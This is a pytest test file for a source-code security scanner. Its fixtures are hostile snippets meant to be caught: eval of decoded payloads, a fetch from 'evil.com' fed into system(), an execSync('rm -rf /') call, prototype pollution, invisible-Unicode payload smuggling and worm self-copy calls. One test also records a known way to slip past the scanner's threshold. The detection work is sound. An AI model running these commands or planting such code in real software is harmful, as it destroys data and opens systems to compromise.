import base64
import os
from unittest.mock import patch

import pytest

from gitgalaxy.security.security_lens import SecurityLens


@pytest.fixture
def lens():
    """Initializes the Security Lens with default policy thresholds."""
    return SecurityLens()


# ==============================================================================
# TEST 1: VULNERABILITY SIGNATURES & REGEX EXTRACTORS
# ==============================================================================
def test_sast_vulnerability_signatures(lens):
    """
    Proves the engine detects specific logic bombs, steganographic imports, prototype
    pollution, and credential leaks using its internal regex rules.
    """
    malicious_code = (
        "// 1. Hardcoded Secrets (Private Info)\n"
        "api_key = 'A1B2C3D4E5F6G7H8I9J0K1L2M3N4O5P6'\n"  # gitleaks:allow
        "\n"
        "// 2. Dynamic Code Execution & Safety Bypasses (Danger & Safety Neg)\n"
        "ini_set('disable_functions', 0);\n"
        "eval(base64_decode(payload));\n"
        "\n"
        "// 3. Steganographic Imports (Shadow Imports)\n"
        "require('hidden_payload.png');\n"
        "\n"
        "// 4. Prototype Pollution (Flux)\n"
        "Object.__proto__ = { polluted: true };\n"
    )

    result = lens.scan_content(malicious_code)
    counts = result["counts"]

    assert counts.get("hardcoded_secrets", 0) > 0, "Failed to detect high-entropy API key!"
    assert counts.get("safety_bypasses", 0) > 0, "Failed to detect safety bypass (ini_set)!"
    assert counts.get("high_risk_execution", 0) > 0, "Failed to detect dynamic execution payload (eval)!"
    assert counts.get("shadow_imports", 0) > 0, "Failed to detect steganographic import!"
    assert counts.get("state_mutation", 0) > 0, "Failed to detect prototype pollution!"


# ==============================================================================
# TEST 2: SHANNON ENTROPY & OBFUSCATION DETECTION
# ==============================================================================
def test_obfuscation_entropy_detection(lens):
    """
    Proves the string extractor drops small strings but accurately calculates
    Shannon Entropy on large, highly randomized base64/hex blocks.
    """
    # A highly random string wrapped in quotes (length > 64 to bypass the ReDoS shield)
    high_entropy_str = "x" + base64.b64encode(os.urandom(100)).decode("utf-8") + "y8f!@#$A9Z"
    code = f'var payload = "{high_entropy_str}";\n'

    result = lens.scan_content(code)
    counts = result["counts"]

    assert counts.get("entropy", 0) > 0, "Failed to calculate high Shannon Entropy on obfuscated string!"


# ==============================================================================
# TEST 3: DATA FLOW TAINT TRACKING (Left-Hand Side Assignment)
# ==============================================================================
def test_data_flow_taint_tracking(lens):
    """Proves the engine can track multi-line taint from I/O sinks to execution sinks (RCE)."""
    code = (
        "// Standard Tainted Injection (Multi-line)\n"
        "let user_input = fetch('http://evil.com/payload');\n"
        "system(user_input);\n"
    )

    result = lens.scan_content(code)
    counts = result["counts"]

    assert counts.get("tainted_injection", 0) > 0, "Failed to track I/O -> Danger taint path!"


# ==============================================================================
# TEST 4: THE AUTO-GEN SHIELD
# ==============================================================================
def test_auto_gen_shield_bypasses(lens):
    """
    Proves that machine generated code bypasses taint tracking and homoglyph
    searches to save CPU cycles and prevent false positives.
    """
    code = (
        "/* eslint-disable */\n"
        "// Auto-generated by Swagger\n"
        "import \u0400 from 'weird-unicode';\n"  # Homoglyph
        "let x = fetch('url');\n"
        "system(x);\n"  # Taint sequence
    )

    result = lens.scan_content(code)
    counts = result["counts"]

    # Homoglyphs and Taint should be explicitly skipped for auto-gen
    assert counts.get("homoglyphs", 0) == 0, "Auto-gen shield failed to block homoglyph scan!"
    assert counts.get("tainted_injection", 0) == 0, "Auto-gen shield failed to block Taint Tracking!"


# ==============================================================================
# TEST 5: BINARY MAGIC BYTE & ENTROPY SCANNER
# ==============================================================================
def test_binary_magic_byte_scanner(lens):
    """
    Proves the X-Ray scanner detects Magic Byte mismatches, embedded execution
    headers (ELF/MZ), and extreme binary entropy.
    """
    # 1. Magic Byte Mismatch: Claiming it's a PNG, but providing an ELF header
    fake_png_bytes = b"\x7fELF some other binary data here"
    result_mismatch = lens.scan_binary(fake_png_bytes, ".png")

    assert "sec_extension_mismatch" in result_mismatch, "Failed to detect Magic Byte mismatch!"
    assert "sec_high_risk_execution" in result_mismatch, "Failed to detect embedded ELF execution header!"

    # 2. High Entropy Binary Payload
    random_bytes = os.urandom(50000)  # Large sample size guarantees entropy > 7.95
    result_entropy = lens.scan_binary(random_bytes, ".bin")

    assert "sec_reflection_metaprogramming" in result_entropy, "Failed to calculate extreme binary entropy!"


# ==============================================================================
# TEST 6: COMPREHENSIVE COVERAGE & SAFE FALLBACKS
# ==============================================================================
def test_comprehensive_fallback_coverage(lens):
    """
    Triggers every remaining catastrophic threshold, empty state fallback,
    and exception handler to achieve 100% branch coverage.
    """
    # 1. Empty Entropy Fallback
    assert lens._calculate_shannon_entropy("") == 0.0

    # 2. Binary Scanner Exception Handler
    # We pass a valid byte array to survive the header scan, but mock the Counter
    # to throw an exception, proving the except block safely swallows it.
    with patch(
        "gitgalaxy.security.security_lens.Counter",
        side_effect=ValueError("Simulated math crash"),
    ):
        result_crash = lens.scan_binary(b"\x00" * 300, ".bin")
        assert result_crash == {}


# ==============================================================================
# TEST 8: MINIFICATION & OBFUSCATION FALLBACK SCREEN (DEEP VALIDATION)
# ==============================================================================


def test_minified_fallback_standard_webpack_chunk(lens):
    """
    [HAPPY PATH] Proves the fallback screen detects multiple disparate execution
    and I/O hooks inside a massive, unbroken 50,000-character line.
    """
    padding = "A" * 50000
    payload = f"var config='{padding}'; eval(atob(payload)); fetch('http://evil.com');"

    result = lens.scan_content(payload)
    counts = result["counts"]
    snippets = result["snippets"]

    assert counts.get("high_risk_execution", 0) > 0, "Failed to catch 'eval(' in 50k char line."
    assert counts.get("io", 0) > 0, "Failed to catch 'fetch(' in 50k char line."
    assert any("[Minified Literal Hit]" in s for s in snippets.get("high_risk_execution", []))


def test_minified_fallback_substring_safety_trap(lens):
    """
    [UNHAPPY PATH] Proves the literal string matcher does not hallucinate on
    safe substrings that mimic malicious hooks (e.g., 'evaluation' vs 'eval').
    """
    padding = "B" * 15000
    # Uses "evaluation(" and "prefetch(" to try and trick the literal search
    payload = f"const data = '{padding}'; function evaluation(x) {{ return true; }} prefetch(data);"

    result = lens.scan_content(payload)
    counts = result["counts"]

    assert counts.get("high_risk_execution", 0) == 0, "Hallucinated 'eval(' on 'evaluation('!"
    assert counts.get("io", 0) == 0, "Hallucinated 'fetch(' on 'prefetch('!"


def test_minified_fallback_buried_node_stealer(lens):
    """
    [EXTREME BOUNDARY] Proves the $O(N)$ string search can locate a threat
    buried at the absolute tail end of a 100KB buffer without timing out.
    """
    padding = "x" * 100000
    payload = (
        f"module.exports = function() {{ var junk = '{padding}'; require('child_process').execSync('rm -rf /'); }};"
    )

    result = lens.scan_content(payload)
    counts = result["counts"]
    snippets = result["snippets"]

    assert counts.get("high_risk_execution", 0) > 0, "Failed to catch 'child_process' at 100KB depth!"
    assert "[Minified Literal Hit]: child_process" in str(snippets.get("high_risk_execution", []))


def test_minified_fallback_mass_threshold_evasion(lens):
    """
    [ADVERSARIAL TRAP] Proves the mathematical boundary of the 10% mass threshold.
    An attacker attempts to evade the fallback screen by padding the file with
    just enough "safe" short lines to keep the safe_content > 10% of total mass,
    while hiding the payload on a 300-character line that the regular regex drops.
    """
    # 15 safe lines, 11 chars each = 165 characters of "safe" content
    safe_lines = "let a = 1;\n" * 15

    # 1 malicious line of ~320 characters
    malicious_long_line = "var b = '" + ("C" * 300) + "'; eval(b);\n"

    payload = safe_lines + malicious_long_line

    # Total length = ~485. Safe length = 165.
    # 165 / 485 = ~34% safe content.
    # Because 34% > 10%, the fallback screen mathematically WILL NOT run.
    # The standard regex WILL drop the 320-char line due to the < 250 ReDoS armor.

    result = lens.scan_content(payload)
    counts = result["counts"]

    # This assertion CONFIRMS the evasion works, establishing the known physical
    # limits of the 10% threshold design.
    assert counts.get("high_risk_execution", 0) == 0, (
        "Threshold evasion failed! The fallback screen ran when it mathematically shouldn't have."
    )


def test_minified_fallback_near_miss_threshold(lens):
    """
    [PRECISION CHECK] Proves the fallback screen properly engages when the safe mass
    is exactly at the 9% mark (just under the 10% threshold).
    """
    # 3 safe lines = ~33 characters
    safe_lines = "let a = 1;\n" * 3

    # 1 malicious line of ~400 characters
    malicious_long_line = "var b = '" + ("D" * 380) + "'; setTimeout(b, 1000);\n"

    payload = safe_lines + malicious_long_line

    # Total length = ~433. Safe length = 33.
    # 33 / 433 = ~7.6% safe content.
    # Because 7.6% < 10%, the fallback screen MUST engage.

    result = lens.scan_content(payload)
    counts = result["counts"]

    assert counts.get("high_risk_execution", 0) > 0, "Fallback screen failed to engage at the 7.6% mass threshold!"


# ==============================================================================
# TEST 9: ADVERSARIAL DATA FLOW & TAINT TRACKING (LHS FALSE EQUIVALENCY)
# ==============================================================================


def test_adversarial_lhs_comparison_trap(lens):
    """
    [ADVERSARIAL TRAP] Proves that the Left-Hand Side (LHS) variable extractor
    does not hallucinate on comparison operators (==, ===, !=, <=).
    """
    payload = """
    // Trap 1: Strict equality comparison
    if (status === 200) { console.log('OK'); }
    
    // Trap 2: Inequality comparison
    if (user_input !== "admin") { die(); }
    
    // Trap 3: Less than or equal
    if (retry_count <= 5) { retry(); }
    
    // Trap 4: String literal containing an assignment operator
    const endpoint = "https://api.example.com/?auth=" + token;
    
    // Actual Taint: This is the ONLY one that should trigger the flow
    let malicious_data = fetch('http://evil.com/payload');
    system(malicious_data);  // <--- Changed to system() to guarantee a valid execution sink
    """

    result = lens.scan_content(payload)
    counts = result["counts"]
    snippets = str(result["snippets"])

    assert counts.get("tainted_injection", 0) == 1, "LHS extractor failed to track the legitimate taint flow!"
    assert "malicious_data" in snippets, "Failed to capture the correct tainted variable!"
    assert "status" not in snippets, "LHS extractor hallucinated on '==='!"


# ==============================================================================
# TEST 10: REGEX EVASION & WHITESPACE MANIPULATION
# ==============================================================================


def test_evasion_whitespace_padding(lens):
    """
    [ADVERSARIAL TRAP] Attackers frequently use massive amounts of whitespace,
    tabs, and newlines between function calls and arguments to evade naive regex.
    This proves the core structural signatures are immune to whitespace evasion.
    """
    payload = """
    // Evasion 1: Spaced out safety bypass
    ini_set   (   'disable_functions'   ,   0   ) ;
    
    // Evasion 2: Spaced out dynamic execution (matches obfuscation model)
    eval  (   atob  (  payload  )  ) ;
    
    // Evasion 3: Bizarre spacing in prototype pollution
    Object  .  __proto__   =   { admin : true } ;
    """

    result = lens.scan_content(payload)
    counts = result["counts"]

    assert counts.get("safety_bypasses", 0) > 0, "Whitespace evasion defeated safety bypass regex!"
    assert counts.get("high_risk_execution", 0) > 0, "Whitespace evasion defeated RCE regex!"
    assert counts.get("state_mutation", 0) > 0, "Whitespace evasion defeated prototype pollution regex!"


# ==============================================================================
# TEST 11: FALSE POSITIVE DEFENSE (STANDARD REGEX)
# ==============================================================================


def test_false_positive_substring_defense_standard(lens):
    """
    [PRECISION CHECK] Proves the standard regex extractors (not just the minified fallback)
    use strict word boundaries (\b) and do not hallucinate threats inside safe variables
    or custom functions that happen to contain threat keywords.
    """
    payload = """
    // Safe variations of 'eval'
    function evaluate_math() { return true; }
    let evaluation_score = 100;
    const revalidation = false;
    
    // Safe variations of 'exec'
    let execute_order_66 = false;
    function my_executor() { pass; }
    
    // Safe variations of 'fetch'
    function prefetch_data() { pass; }
    let dog_fetch_toy = true;
    """

    result = lens.scan_content(payload)
    counts = result["counts"]

    assert counts.get("high_risk_execution", 0) == 0, "Standard regex hallucinated on 'eval/exec' substring!"
    assert counts.get("io", 0) == 0, "Standard regex hallucinated on 'fetch' substring!"


# ==============================================================================
# TEST 12: FALSE POSITIVE DEFENSE -- RULE-QUALITY REGRESSIONS (issue #1166)
# ==============================================================================


def test_high_risk_execution_requires_call_not_bare_word(lens):
    """
    [PRECISION CHECK] 'system' is common English prose (e.g. "Build System") as well as
    a dangerous call. The signature must require a trailing '(' to distinguish the two.
    """
    prose = 'print("  [+] Generated Build System: pom.xml, application.yml")'
    call = "system(user_input)"

    prose_counts = lens.scan_content(prose)["counts"]
    call_counts = lens.scan_content(call)["counts"]

    assert prose_counts.get("high_risk_execution", 0) == 0, "Hallucinated RCE on the word 'System' in prose!"
    assert call_counts.get("high_risk_execution", 0) > 0, "Failed to catch an actual system() call!"


def test_entropy_extractor_does_not_span_multiple_short_literals(lens):
    """
    [PRECISION CHECK] Proves the string extractor stops at the quote that opened it instead
    of stitching a short literal together with unrelated code text past it to reach the
    64-char floor (e.g. chained dict-key lookups like config["A"].get("B")).
    """
    config_lookup = (
        'vendor_paths = _worker_state["config"].get("APERTURE_CONFIG", {}).get("VENDOR_MINIFICATION_PATHS", [])'
    )

    result = lens.scan_content(config_lookup)["counts"]

    assert result.get("entropy", 0) == 0, "Hallucinated high entropy on a chained config dict-key lookup!"


def test_io_resolve_requires_dns_namespace(lens):
    """
    [PRECISION CHECK] Bare 'resolve(' collides with the extremely common Path.resolve()/
    Promise.resolve(). Only the dns.* namespaced variants (actual DNS exfiltration) should match.
    """
    path_resolve = 'target_path = Path(session_meta.get("target_directory", "")).resolve()'
    dns_resolve = "dns.resolve4(hostname, callback)"

    path_counts = lens.scan_content(path_resolve)["counts"]
    dns_counts = lens.scan_content(dns_resolve)["counts"]

    assert path_counts.get("io", 0) == 0, "Hallucinated network I/O on a plain Path.resolve() call!"
    assert dns_counts.get("io", 0) > 0, "Failed to catch an actual dns.resolve4() exfiltration call!"


# ==============================================================================
# TEST 13: GLASSWORM-STYLE SELF-PROPAGATION DETECTOR (issue #1150)
# ==============================================================================
def test_unicode_steganography_run_detection(lens):
    """
    [DETECTION] A RUN of 3+ consecutive Unicode Variation Selector/Tag codepoints
    is the actual invisible-payload-smuggling technique GlassWorm used -- each
    invisible codepoint encodes one payload byte, so a useful payload necessarily
    requires many in a row.
    """
    hidden_payload = "const x = 1;" + ("\U000e0101\U000e0102\U000e0103\U000e0104\U000e0105") + "\n"

    result = lens.scan_content(hidden_payload)
    counts = result["counts"]

    assert counts.get("unicode_steganography", 0) > 0, "Failed to detect a run of invisible Unicode codepoints!"


def test_unicode_steganography_ignores_single_emoji_presentation_selector(lens):
    """
    [FALSE POSITIVE DEFENSE] A single trailing Variation Selector-16 forcing emoji
    presentation (e.g. the heart in "❤️") is common and benign -- only a
    RUN of 3+ has no legitimate source-code use. A lone VS16 must never fire.
    """
    benign_emoji = 'const heart = "❤️";\nconst thumbsup = "\U0001f44d️";\n'

    result = lens.scan_content(benign_emoji)
    counts = result["counts"]

    assert counts.get("unicode_steganography", 0) == 0, "Hallucinated steganography on ordinary emoji text!"


def test_self_propagation_detects_self_copy_and_self_overwrite(lens):
    """
    [DETECTION] A worm's defining mechanical trait is duplicating or overwriting
    itself: a self-file-reference token passed as the literal first argument to a
    copy/write/rename call, across the JS and Python idioms.
    """
    js_self_copy = "fs.copyFileSync(__filename, path.join(hideout, path.basename(__filename)));"
    js_self_overwrite = "fs.writeFileSync(__filename, tamperedSourceBuffer);"
    py_self_copy = "shutil.copy(__file__, os.path.join(persistence_dir, 'update.py'))"

    assert lens.scan_content(js_self_copy)["counts"].get("self_propagation", 0) > 0
    assert lens.scan_content(js_self_overwrite)["counts"].get("self_propagation", 0) > 0
    assert lens.scan_content(py_self_copy)["counts"].get("self_propagation", 0) > 0


def test_self_propagation_ignores_ordinary_path_resolution_and_self_reads(lens):
    """
    [FALSE POSITIVE DEFENSE] __filename/__file__ used for ordinary path resolution
    or read-only self-inspection (both extremely common, benign idioms) must never
    fire -- only a self-ref token handed straight into a mutating call qualifies.
    """
    path_resolution = "const baseDir = path.dirname(__filename);\nrequire(path.join(__dirname, 'config.js'));\n"
    self_read = "version = open(__file__).read().splitlines()[0]\n"
    unrelated_rename = "os.rename(old_report_path, archived_report_path)\n"

    assert lens.scan_content(path_resolution)["counts"].get("self_propagation", 0) == 0
    assert lens.scan_content(self_read)["counts"].get("self_propagation", 0) == 0
    assert lens.scan_content(unrelated_rename)["counts"].get("self_propagation", 0) == 0
